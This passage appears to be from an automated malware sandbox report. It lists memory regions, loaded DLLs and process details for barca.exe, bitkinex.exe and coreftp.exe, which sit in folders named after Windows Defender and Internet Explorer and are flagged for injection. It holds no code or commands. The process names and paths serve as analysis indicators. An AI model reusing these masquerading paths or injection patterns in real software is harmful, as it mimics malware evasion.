= 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1674 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1675 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1676 start_va = 0x7fff0000 end_va = 0x7ffdab58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1677 start_va = 0x7ffdab590000 end_va = 0x7ffdab750fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1678 start_va = 0x7ffdab751000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffdab751000" filename = "" Region: id = 1680 start_va = 0xc60000 end_va = 0xda5fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c60000" filename = "" Thread: id = 91 os_tid = 0xe80 Thread: id = 92 os_tid = 0xc7c Process: id = "12" image_name = "barca.exe" filename = "c:\\program files (x86)\\windows defender\\barca.exe" page_root = "0x49937000" os_pid = "0x3c8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "5" os_parent_pid = "0x78c" cmd_line = "\"C:\\Program Files (x86)\\Windows Defender\\barca.exe\" " cur_dir = "C:\\Program Files (x86)\\Windows Defender\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fe14" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1681 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1682 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1683 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1684 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1685 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1686 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1687 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1688 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1689 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1690 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1691 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1692 start_va = 0x1f0000 end_va = 0x2adfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1693 start_va = 0x2b0000 end_va = 0x2b3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 1694 start_va = 0x2e0000 end_va = 0x2f6fff monitored = 0 entry_point = 0x2e14a1 region_type = mapped_file name = "barca.exe" filename = "\\Program Files (x86)\\Windows Defender\\barca.exe" (normalized: "c:\\program files (x86)\\windows defender\\barca.exe") Region: id = 1695 start_va = 0x340000 end_va = 0x3fbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1696 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1697 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1698 start_va = 0x8a0000 end_va = 0xa27fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008a0000" filename = "" Region: id = 1699 start_va = 0xa30000 end_va = 0xbb0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a30000" filename = "" Region: id = 1700 start_va = 0xbc0000 end_va = 0x1fbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bc0000" filename = "" Region: id = 1701 start_va = 0x2090000 end_va = 0x209ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002090000" filename = "" Region: id = 1702 start_va = 0x2190000 end_va = 0x219ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002190000" filename = "" Region: id = 1703 start_va = 0x21a0000 end_va = 0x2b63fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000021a0000" filename = "" Region: id = 1704 start_va = 0x639e0000 end_va = 0x63a2ffff monitored = 0 entry_point = 0x639f8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1705 start_va = 0x63a30000 end_va = 0x63a37fff monitored = 0 entry_point = 0x63a317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1706 start_va = 0x63a40000 end_va = 0x63ab9fff monitored = 0 entry_point = 0x63a53290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1707 start_va = 0x6fef0000 end_va = 0x6ff0cfff monitored = 0 entry_point = 0x6fef3b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 1708 start_va = 0x70610000 end_va = 0x70684fff monitored = 0 entry_point = 0x70649a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1709 start_va = 0x744b0000 end_va = 0x74541fff monitored = 0 entry_point = 0x744f0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 1710 start_va = 0x74550000 end_va = 0x74559fff monitored = 0 entry_point = 0x74552a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1711 start_va = 0x74560000 end_va = 0x7457dfff monitored = 0 entry_point = 0x7456b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1712 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1713 start_va = 0x74db0000 end_va = 0x74e6dfff monitored = 0 entry_point = 0x74de5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1714 start_va = 0x75640000 end_va = 0x75786fff monitored = 0 entry_point = 0x75651cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1715 start_va = 0x757e0000 end_va = 0x75823fff monitored = 0 entry_point = 0x757f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1716 start_va = 0x759b0000 end_va = 0x75a5cfff monitored = 0 entry_point = 0x759c4f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1717 start_va = 0x75a70000 end_va = 0x75b8efff monitored = 0 entry_point = 0x75ab5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1718 start_va = 0x75bf0000 end_va = 0x75dacfff monitored = 0 entry_point = 0x75cd2a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1719 start_va = 0x771b0000 end_va = 0x772fefff monitored = 0 entry_point = 0x77266820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1720 start_va = 0x77420000 end_va = 0x7759dfff monitored = 0 entry_point = 0x774d1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1721 start_va = 0x77740000 end_va = 0x7776afff monitored = 0 entry_point = 0x77745680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1722 start_va = 0x777d0000 end_va = 0x77827fff monitored = 0 entry_point = 0x778125c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1723 start_va = 0x77830000 end_va = 0x779aafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1724 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1725 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1726 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1727 start_va = 0x7fff0000 end_va = 0x7ffdab58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1728 start_va = 0x7ffdab590000 end_va = 0x7ffdab750fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1729 start_va = 0x7ffdab751000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffdab751000" filename = "" Region: id = 1732 start_va = 0x600000 end_va = 0x6fafff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Thread: id = 93 os_tid = 0xba8 Thread: id = 94 os_tid = 0x378 Process: id = "13" image_name = "bitkinex.exe" filename = "c:\\program files\\windows multimedia platform\\bitkinex.exe" page_root = "0x5794d000" os_pid = "0xdcc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "5" os_parent_pid = "0x78c" cmd_line = "\"C:\\Program Files\\Windows Multimedia Platform\\bitkinex.exe\" " cur_dir = "C:\\Program Files\\Windows Multimedia Platform\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fe14" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1733 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1734 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1735 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1736 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1737 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1738 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1739 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1740 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1741 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1742 start_va = 0x1d0000 end_va = 0x28dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1743 start_va = 0x2d0000 end_va = 0x2d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 1744 start_va = 0x2e0000 end_va = 0x2e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 1745 start_va = 0x300000 end_va = 0x316fff monitored = 0 entry_point = 0x3014a1 region_type = mapped_file name = "bitkinex.exe" filename = "\\Program Files\\Windows Multimedia Platform\\bitkinex.exe" (normalized: "c:\\program files\\windows multimedia platform\\bitkinex.exe") Region: id = 1746 start_va = 0x360000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 1747 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1748 start_va = 0x660000 end_va = 0x75ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 1749 start_va = 0x770000 end_va = 0x77ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 1750 start_va = 0x880000 end_va = 0xa07fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000880000" filename = "" Region: id = 1751 start_va = 0xa10000 end_va = 0xb90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a10000" filename = "" Region: id = 1752 start_va = 0xba0000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ba0000" filename = "" Region: id = 1753 start_va = 0x1fa0000 end_va = 0x205bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001fa0000" filename = "" Region: id = 1754 start_va = 0x2150000 end_va = 0x215ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002150000" filename = "" Region: id = 1755 start_va = 0x2160000 end_va = 0x2b23fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002160000" filename = "" Region: id = 1756 start_va = 0x639e0000 end_va = 0x63a2ffff monitored = 0 entry_point = 0x639f8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1757 start_va = 0x63a30000 end_va = 0x63a37fff monitored = 0 entry_point = 0x63a317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1758 start_va = 0x63a40000 end_va = 0x63ab9fff monitored = 0 entry_point = 0x63a53290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1759 start_va = 0x6fef0000 end_va = 0x6ff0cfff monitored = 0 entry_point = 0x6fef3b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 1760 start_va = 0x70610000 end_va = 0x70684fff monitored = 0 entry_point = 0x70649a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1761 start_va = 0x744b0000 end_va = 0x74541fff monitored = 0 entry_point = 0x744f0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 1762 start_va = 0x74550000 end_va = 0x74559fff monitored = 0 entry_point = 0x74552a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1763 start_va = 0x74560000 end_va = 0x7457dfff monitored = 0 entry_point = 0x7456b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1764 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1765 start_va = 0x74db0000 end_va = 0x74e6dfff monitored = 0 entry_point = 0x74de5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1766 start_va = 0x75640000 end_va = 0x75786fff monitored = 0 entry_point = 0x75651cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1767 start_va = 0x757e0000 end_va = 0x75823fff monitored = 0 entry_point = 0x757f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1768 start_va = 0x759b0000 end_va = 0x75a5cfff monitored = 0 entry_point = 0x759c4f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1769 start_va = 0x75a70000 end_va = 0x75b8efff monitored = 0 entry_point = 0x75ab5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1770 start_va = 0x75bf0000 end_va = 0x75dacfff monitored = 0 entry_point = 0x75cd2a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1771 start_va = 0x771b0000 end_va = 0x772fefff monitored = 0 entry_point = 0x77266820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1772 start_va = 0x77420000 end_va = 0x7759dfff monitored = 0 entry_point = 0x774d1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1773 start_va = 0x77740000 end_va = 0x7776afff monitored = 0 entry_point = 0x77745680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1774 start_va = 0x777d0000 end_va = 0x77827fff monitored = 0 entry_point = 0x778125c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1775 start_va = 0x77830000 end_va = 0x779aafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1776 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1777 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1778 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1779 start_va = 0x7fff0000 end_va = 0x7ffdab58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1780 start_va = 0x7ffdab590000 end_va = 0x7ffdab750fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1781 start_va = 0x7ffdab751000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffdab751000" filename = "" Region: id = 1783 start_va = 0x2b30000 end_va = 0x2cd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002b30000" filename = "" Thread: id = 95 os_tid = 0xbac Thread: id = 96 os_tid = 0x50c Process: id = "14" image_name = "coreftp.exe" filename = "c:\\program files\\internet explorer\\coreftp.exe" page_root = "0x59457000" os_pid = "0xc68" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "5" os_parent_pid = "0x78c" cmd_line = "\"C:\\Program Files\\Internet Explorer\\coreftp.exe\" " cur_dir = "C:\\Program Files\\Internet Explorer\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fe14" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1785 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1786 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1787 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1788 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1789 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1790 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1791 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1792 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1793 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1794 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1795 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1796 start_va = 0x1f0000 end_va = 0x1f3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 1797 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1798 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1799 start_va = 0x500000 end_va = 0x5bbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 1800 start_va = 0x5e0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 1801 start_va = 0x720000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 1802 start_va = 0x820000 end_va = 0x9a7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000820000" filename = "" Region: id = 1803 start_va = 0x9b0000 end_va = 0xb30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009b0000" filename = "" Region: id = 1804 start_va = 0xc70000 end_va = 0xc7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c70000" filename = "" Region: id = 1805 start_va = 0xf00000 end_va = 0xf16fff monitored = 0 entry_point = 0xf014a1 region_type = mapped_file name = "coreftp.exe" filename = "\\Program Files\\Internet Explorer\\coreftp.exe" (normalized: "c:\\program files\\internet explorer\\coreftp.exe") Region: id = 1806 start_va = 0xf20000 end_va = 0x231ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f20000" filename = "" Region: id = 1807 start_va = 0x2320000 end_va = 0x2ce3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002320000" filename = "" Region: id = 1808 start_va = 0x639e0000 end_va = 0x63a2ffff monitored = 0 entry_point = 0x639f8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1809 start_va = 0x63a30000 end_va = 0x63a37fff monitored = 0 entry_point = 0x63a317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1810 start_va = 0x63a40000 end_va = 0x63ab9fff monitored = 0 entry_point = 0x63a53290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1811 start_va = 0x6fef0000 end_va = 0x6ff0cfff monitored = 0 entry_point = 0x6fef3b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 1812 start_va = 0x70610000 end_va = 0x70684fff monitored = 0 entry_point = 0x70649a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1813 start_va = 0x744b0000 end_va = 0x74541fff monitored = 0 entry_point = 0x744f0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 1814 start_va = 0x74550000 